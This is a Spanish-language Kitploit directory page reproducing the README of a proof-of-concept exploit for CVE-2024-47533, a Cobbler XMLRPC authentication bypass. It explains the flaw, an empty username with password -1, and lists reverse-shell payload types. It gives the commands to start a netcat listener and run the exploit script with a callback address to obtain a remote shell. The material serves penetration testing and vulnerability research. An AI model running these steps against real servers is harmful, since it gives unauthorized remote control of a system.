Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — La CVE-2024-47533 es una vulnerabilidad crítica de omisión de autenticación en Cobbler (versiones 3.0.0 hasta antes de 3.2.3 y 3.3.7) que permite la ejecución remota de código sin autenticación a través de la interfaz XMLRPC. | Kitploit
Herramientas/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
Autenticación y AutorizaciónGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

La CVE-2024-47533 es una vulnerabilidad crítica de omisión de autenticación en Cobbler (versiones 3.0.0 hasta antes de 3.2.3 y 3.3.7) que permite la ejecución remota de código sin autenticación a través de la interfaz XMLRPC.

Ver RepositorioSitio web
81hace 1 añoAún no revisado
Compartir

CVE-2024-47533 - Explotación de RCE por omisión de autenticación en el XMLRPC de Cobbler

⚠️ Ejecución remota de código crítica mediante omisión de autenticación en Cobbler
🛠️ Implementación del PoC por @dollarboysushil


💡 Descripción general

Cobbler, un servidor de instalación de Linux que permite configurar rápidamente entornos de instalación en red, presenta una vulnerabilidad de autenticación en las versiones 3.0.0 hasta (pero sin incluir) las versiones 3.2.3 y 3.3.7. La función utils.get_shared_secret() siempre devuelve -1, lo que permite que cualquier persona se conecte a la interfaz XML-RPC de Cobbler con un nombre de usuario vacío ('') y la contraseña -1. Esto permite que un atacante con acceso a la red obtenga el control total del servidor Cobbler. La vulnerabilidad se corrige en las versiones 3.2.3 y 3.3.7.


🛠 Desglose técnico

La vulnerabilidad se debe al manejo incorrecto del secreto compartido en la función utils.get_shared_secret(), que siempre devuelve -1, omitiendo efectivamente la autenticación. Esto permite que cualquier usuario de la red se conecte a la interfaz XMLRPC de Cobbler con credenciales vacías y ejecute comandos arbitrarios.


🔥 Endpoint vulnerable

http://<target>:25151/ — endpoint de la API XMLRPC de Cobbler


💥 Ejemplos de payloads

El script de explotación admite varios payloads de reverse shell, entre ellos:

  • Reverse shell con Bash
  • Shells de Netcat (nc, nc2)
  • Reverse shell con Python
  • Descarga y ejecución con Curl

🔬 Demostración de la prueba de concepto (PoC)

📡 Preparación del listener

Inicie un listener de Netcat en su máquina:

root@kitploit:~
nc -lvnp 4444

listener de netcat

🚀 Ejecución del exploit

Ejecute el script de explotación CVE-2024-47533-dbs.py.

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 Acceso remoto exitoso a la shell

Tras una ejecución exitosa, la reverse shell se conectará de vuelta al listener, otorgando al atacante acceso remoto al servidor.

Reverse shell exitosa

📝 Referencias

  • Aviso de seguridad de SUSE para CVE-2024-47533
  • Aviso de seguridad de GitHub GHSA-m26c-fcgh-cp6h
  • Base de datos de vulnerabilidades de Snyk: SNYK-PYTHON-COBBLER-8384360
Descargar herramienta